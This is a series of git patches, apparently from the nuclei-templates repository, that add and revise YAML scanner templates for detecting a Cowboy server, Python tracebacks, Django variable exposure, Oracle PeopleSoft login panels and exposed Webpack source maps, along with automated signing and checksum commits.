Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 2 Jun 2024 06:15:20 +0000 Subject: [PATCH 588/847] Auto Template Signing [Sun Jun 2 06:15:20 UTC 2024] :robot: --- http/technologies/cowboy-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml index 2eff270b16..8e9c23297a 100644 --- a/http/technologies/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -24,3 +24,4 @@ requests: words: - "Server: Cowboy" case-insensitive: true +# digest: 4a0a004730450221008a129a8698bf5b5807aaa2bc8701d741edf9931332efa314bb1efd9e3160892002202432136de7b8a35cf37a2a968556d4425de3ace4028a082a20e706c3ea65510a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb74f6aab26e1427468b9d13e0103e87a5a342d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 11:54:19 +0530 Subject: [PATCH 589/847] Create dont-panic-traceback.yaml --- .../dont-panic-traceback.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/misconfiguration/dont-panic-traceback.yaml diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml new file mode 100644 index 0000000000..ef9b175207 --- /dev/null +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -0,0 +1,27 @@ +id: dont-panic-traceback + +info: + name: DON'T PANIC Traceback + author: ritikchaddha + severity: low + description: DON'T PANIC Traceback was detected. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Debugger" + tags: traceback,dont-panic,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "most recent call last" + - "Traceback" + - "DON'T PANIC" + condition: and + case-insensitive: true From 0e72f047340906cedb024d95d1835c24c54e668e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 12:07:16 +0530 Subject: [PATCH 590/847] Fix FN django-variables-exposed.yaml --- http/exposures/configs/django-variables-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index a8ecb5f686..f1a4fd7bf5 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -50,5 +50,6 @@ http: - type: status status: - 400 + - 500 # digest: 4a0a0047304502206f3cceff2a49b7e830b5640ef43b674856508c9ef6a1e5a48080f2b377b018c7022100de2304b178a37586efd5bd0556183efdb7088d00c970c09766406c6394fe795e:922c64590222798bb761d5b6d8e72950 From e50ea66551b86069b6716032e45a9d6b83e97719 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sun, 2 Jun 2024 10:09:14 +0200 Subject: [PATCH 591/847] Update tpl --- .../exposed-panels/oracle-people-sign-in.yaml | 36 +++++++++++-------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-people-sign-in.yaml index 54c1e2e1a2..c00ce3f892 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-people-sign-in.yaml @@ -2,7 +2,7 @@ id: oracle-people-sign-in info: name: Oracle PeopleSoft Login Panel - Detect - author: idealphase + author: idealphase,righettod severity: info description: Oracle PeopleSoft login panel was detected. classification: @@ -11,26 +11,32 @@ info: metadata: max-request: 1 shodan-query: http.title:"Oracle PeopleSoft Sign-in" - tags: oracle,panel + tags: oracle,panel,login,detect http: - method: GET path: - - '{{BaseURL}}' + - '{{BaseURL}}/psp/csprd/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/retess/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/fscmprod/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/CT920/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/esshrprd/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/ps/?&cmd=login&languageCd=ENG&' - host-redirects: true + stop-at-first-match: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - - type: word - part: body - words: - - '<title>Oracle PeopleSoft Sign-in' - - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"' - condition: or + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in\" title=\"oracle peoplesoft sign-in\"")' + condition: and - - type: status - status: - - 200 -# digest: 4a0a004730450220534a813cfd286f86aac6bf1ce17b27b6c7b7de5f18eb4b195db1d5ec6a96288f022100b08a023d57ce6c6abb820161ff4ef992d4cd670007e92cdb2d4dc018d01ef3a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\*\s+Copyright\s+\(c\)\s+([0-9,\s]+)\s+Oracle\s+and\/or\s+its\s+affiliates.' From b910d02b4ac2fbb517e249ef5c9550bbe8949a59 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 2 Jun 2024 10:16:42 +0200 Subject: [PATCH 592/847] Add the reference attribute --- http/exposed-panels/oracle-people-sign-in.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-people-sign-in.yaml index c00ce3f892..c8ad56aeb1 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-people-sign-in.yaml @@ -5,6 +5,8 @@ info: author: idealphase,righettod severity: info description: Oracle PeopleSoft login panel was detected. + reference: + - https://www.oracle.com/applications/peoplesoft/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 0e9099b0555d3ecdc31488b42dab89cb1a7e9c59 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 18:04:17 +0530 Subject: [PATCH 593/847] fix matcher and format --- ...n-in.yaml => oracle-peoplesoft-panel.yaml} | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) rename http/exposed-panels/{oracle-people-sign-in.yaml => oracle-peoplesoft-panel.yaml} (57%) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml similarity index 57% rename from http/exposed-panels/oracle-people-sign-in.yaml rename to http/exposed-panels/oracle-peoplesoft-panel.yaml index c8ad56aeb1..5058818389 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -1,4 +1,4 @@ -id: oracle-people-sign-in +id: oracle-peoplesoft-panel info: name: Oracle PeopleSoft Login Panel - Detect @@ -11,19 +11,26 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + verified: true + max-request: 7 shodan-query: http.title:"Oracle PeopleSoft Sign-in" - tags: oracle,panel,login,detect + fofa-query: title="Oracle PeopleSoft Sign-in" + tags: oracle,peoplesoft,panel,login,detect http: - method: GET path: - - '{{BaseURL}}/psp/csprd/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/retess/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/fscmprod/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/CT920/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/esshrprd/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/ps/?&cmd=login&languageCd=ENG&' + - '{{BaseURL}}' + - '{{BaseURL}}/{{path}}' + + payloads: + path: + - psp/csprd/?cmd=login&languageCd=ENG& + - psp/retess/?cmd=login&languageCd=ENG& + - psp/fscmprod/?cmd=login&languageCd=ENG& + - psp/CT920/?cmd=login&languageCd=ENG& + - psp/esshrprd/?cmd=login&languageCd=ENG& + - psp/ps/?&cmd=login&languageCd=ENG& stop-at-first-match: true redirects: true @@ -33,7 +40,7 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in\" title=\"oracle peoplesoft sign-in\"")' + - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in", "title=\"oracle peoplesoft sign-in")' condition: and extractors: From 6c34afd5b0b661080d30633a6966a9888968d439 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 2 Jun 2024 20:11:40 +0400 Subject: [PATCH 594/847] minor changes --- headless/webpack-sourcemap-hunter | 41 ++++++++++++++++++------------- 1 file changed, 24 insertions(+), 17 deletions(-) diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap-hunter index 3ef43a2acd..622ed9e967 100644 --- a/headless/webpack-sourcemap-hunter +++ b/headless/webpack-sourcemap-hunter @@ -1,37 +1,41 @@ -id: Webpack-Sourcemap +id: webpack-sourcemap + info: - name: Webpack-Sourcemap - author: lucky0x0d, PulseSecurity.co.nz + name: Webpack Sourcemap + author: lucky0x0d,PulseSecurity.co.nz + severity: low + description: | + Detects if Webpack source maps are exposed. + impact: | + Exposure of source maps can leak sensitive information about the application's source code and potentially aid attackers in identifying vulnerabilities. + remediation: | + Ensure that Webpack source maps are not exposed to the public by configuring the server to restrict access to them. reference: - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage - severity: low tags: javascript,webpack,sourcemaps - classification: - cwe-id: CWE-200 - description: parses target to find scripts and then checks for a sourcemapconsumer, inline sourcemaps, if js files have map files, if sourcemap headers exists - metadata: - max-request: 1 headless: - steps: - args: url: "{{BaseURL}}" action: navigate + - action: sleep args: duration: 10 + - action: script name: extract args: code: | - () => { - AAA = []; - window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); - BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] - CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] - return [...new Set([...AAA, ...BBB, ...CCC])]; - } + () => { + AAA = []; + window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); + BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] + CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] + return [...new Set([...AAA, ...BBB, ...CCC])]; + } extractors: - type: regex @@ -40,7 +44,6 @@ headless: part: extract regex: - (?i)http(.[~a-zA-Z0-9.\/\-_:]+) - flow: | headless(); http("check_base_srcmap_inline"); @@ -148,6 +151,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -168,6 +172,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -188,6 +193,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -208,6 +214,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 From 8ff3fbc3cb7a3a3972bea39a27fd0f135b106a5d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 2 Jun 2024 20:25:15 +0400 Subject: [PATCH 595/847] Rename webpack-sourcemap-hunter to webpack-sourcemap.yaml --- headless/{webpack-sourcemap-hunter => webpack-sourcemap.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename headless/{webpack-sourcemap-hunter => webpack-sourcemap.yaml} (100%) diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap.yaml similarity index 100% rename from headless/webpack-sourcemap-hunter rename to headless/webpack-sourcemap.yaml From 401e48bfa7a06140d557453c8cc11d0575c2bf7b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:30:21 +0000 Subject: [PATCH 596/847] Auto Generated New Template Addition List [Sun Jun 2 16:30:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index df882b48cf..2d7ab1ea48 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +headless/webpack-sourcemap.yaml http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml From c6f5555b5f994531b5e2ad21a23c8c352adf011f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:30:39 +0000 Subject: [PATCH 597/847] Auto Generated Templates Checksum [Sun Jun 2 16:30:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ddd2776b49..816dc698ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -579,6 +579,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 +headless/webpack-sourcemap.yaml:f4fffc8ef5c82993739161e22481729e26074d16 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -6726,7 +6727,7 @@ http/technologies/coming-soon-page-detect.yaml:11bc0a870298c1a1cf414f677762ccba0 http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff6 http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 -http/technologies/cowboy-detect.yaml:c35c9dffcc604d9cea63db82ff86acaf1646b8c0 +http/technologies/cowboy-detect.yaml:b8301635f816554b7cb6774cff657725c9d9956f http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 @@ -8617,7 +8618,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2570a9df52702c19d290a325cc50de8ab1f69b8a +templates-checksum.txt:769f3304117aa68254cb99c12bff89cd40d88b3e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3150c67fa5d6687d1be4ec31c04c496c6b75879a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:31:00 +0000 Subject: [PATCH 598/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5881440d8e..e80e54ad36 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'headless/webpack-sourcemap.yaml' - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' From 18ebb4513f3cb69ab79b6882d363eab3ef92650a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:31:53 +0000 Subject: [PATCH 600/847] Auto Generated Templates Checksum [Sun Jun 2 16:31:53 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 816dc698ee..c042eeb76a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4667,7 +4667,7 @@ http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 http/exposures/configs/deployment-ini.yaml:333132cbc8a1874f239fed48f924a70752a4a46e http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 -http/exposures/configs/django-variables-exposed.yaml:30ad3076e779010142f49d0a27c4bffee7e40743 +http/exposures/configs/django-variables-exposed.yaml:fb2f53f6ba6444f1bd26735f2f2553d1e1ac1a25 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 http/exposures/configs/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383 http/exposures/configs/dockerfile-hidden-disclosure.yaml:5b74c22b6a4d55f0b5cb8fd47e9a181453340d63 @@ -8618,7 +8618,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:769f3304117aa68254cb99c12bff89cd40d88b3e +templates-checksum.txt:ed7b014040f2673727a1003c0d07a4659b2bc98e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d7ff1b8656619fe4a5bc4302a31ab019c67d1df1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 2 Jun 2024 22:02:11 +0530 Subject: [PATCH 601/847] minor update --- http/misconfiguration/dont-panic-traceback.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index ef9b175207..557553f5d9 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -4,7 +4,8 @@ info: name: DON'T PANIC Traceback author: ritikchaddha severity: low - description: DON'T PANIC Traceback was detected. + description: | + DON'T PANIC Traceback was detected. metadata: max-request: 1 verified: true From 6d61dab5926111fd7c1fef4883368505da9e6875 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:32:21 +0000 Subject: [PATCH 602/847] Auto Template Signing [Sun Jun 2 16:32:21 UTC 2024] :robot: --- headless/webpack-sourcemap.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index 622ed9e967..0da0eff55f 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -218,3 +218,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022037d26b0bf4e1e46e77bcae5925a09f8dd5e8ea38894b06c3a450cac92ae803b5022016539aa792c7f25f571a45c194e983fa46aa24f8980c2829025ebf9e7c4e3b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 53c40ae1b37cec93e0d9905dff5778f5a7c60e07 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:35:12 +0000 Subject: [PATCH 603/847] Auto Generated New Template Addition List [Sun Jun 2 16:35:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2d7ab1ea48..039efae600 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml http/miscellaneous/directory-listing.yaml +http/misconfiguration/dont-panic-traceback.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml From 77352ad05c3a13846b7acbf98e9d770bcc4e77eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:35:16 +0000 Subject: [PATCH 604/847] Auto Generated Templates Checksum [Sun Jun 2 16:35:16 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c042eeb76a..91e91e0dec 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -579,7 +579,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 -headless/webpack-sourcemap.yaml:f4fffc8ef5c82993739161e22481729e26074d16 +headless/webpack-sourcemap.yaml:c23ffc4991461ced4e784fff2889519393bb1fd1 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -5332,6 +5332,7 @@ http/misconfiguration/dlink-unauth-cgi-script.yaml:e2461bf769dc0ad41f83df9c7d2f7 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 +http/misconfiguration/dont-panic-traceback.yaml:787e03c05e44bc4f63f74daceb44435cd8fc73d8 http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:dcd541d6927e9930c8f13cbe69c72c1f48a3b44c @@ -8618,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ed7b014040f2673727a1003c0d07a4659b2bc98e +templates-checksum.txt:8062ab3a82fb31c59eafa6dbffb1a1206bb77cc2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From faeeb51cd57895b0e9976e0fec785cc50d47f2e3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:35:59 +0000 Subject: [PATCH 605/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e80e54ad36..4fcb0240cf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/miscellaneous/directory-listing.yaml' + - 'http/misconfiguration/dont-panic-traceback.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' From d5f6cc197c2c5b1f01a1df110eb752894b0099eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:37:05 +0000 Subject: [PATCH 606/847] Auto Template Signing [Sun Jun 2 16:37:05 UTC 2024] :robot: --- http/exposures/configs/django-variables-exposed.yaml | 3 +-- http/misconfiguration/dont-panic-traceback.yaml | 1 + 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index f1a4fd7bf5..72ad7b5639 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -51,5 +51,4 @@ http: status: - 400 - 500 - -# digest: 4a0a0047304502206f3cceff2a49b7e830b5640ef43b674856508c9ef6a1e5a48080f2b377b018c7022100de2304b178a37586efd5bd0556183efdb7088d00c970c09766406c6394fe795e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f67dd14e356fef79d9b80e6c9036835e73695659b834b166d39b5832d8d8677b02201fd1315aae896bd498f008b7a534809cbd5510094e9199d6e04fd4a3d46f9add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index 557553f5d9..e973ef835a 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -26,3 +26,4 @@ requests: - "DON'T PANIC" condition: and case-insensitive: true +# digest: 4a0a004730450220753b248a82537d74321f3d166e708bde25d810b46869022b5308b6a49d905a9e022100cfbd256f8d9a2de30a8db36826f509c392bfd7778bd393f92c025a2ef0e70ce7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e1539006004c0439deb23bfb65dc31599d48d493 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:38:16 +0000 Subject: [PATCH 607/847] Auto Generated New Template Addition List [Sun Jun 2 16:38:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 039efae600..f71bbbc72d 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/oracle-access-management.yaml +http/exposed-panels/oracle-peoplesoft-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml From 629896a57310867293aae5707df103a6b26eaefe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:38:19 +0000 Subject: [PATCH 608/847] Auto Generated Templates Checksum [Sun Jun 2 16:38:19 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 91e91e0dec..46d7312833 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4205,7 +4205,7 @@ http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f http/exposed-panels/oracle-people-enterprise.yaml:1d99296ada4cbb377939cfb07a4171a2569d36ea -http/exposed-panels/oracle-people-sign-in.yaml:b465ed03a35244adb8f9c88b9fe7ebd5cc7b7447 +http/exposed-panels/oracle-peoplesoft-panel.yaml:d8a82c1cd1554621b203704ed6dfcc00d116260e http/exposed-panels/orchid-vms-panel.yaml:ea0e836bcb094ab56245bb733490e2c210fdba72 http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 http/exposed-panels/osticket/osticket-install.yaml:622ae6b555a887e823b9252eb9509ffb1b7d155f @@ -4667,7 +4667,7 @@ http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 http/exposures/configs/deployment-ini.yaml:333132cbc8a1874f239fed48f924a70752a4a46e http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 -http/exposures/configs/django-variables-exposed.yaml:fb2f53f6ba6444f1bd26735f2f2553d1e1ac1a25 +http/exposures/configs/django-variables-exposed.yaml:f459d04766a2b8b6cb97e522e0623abc7c3a8b17 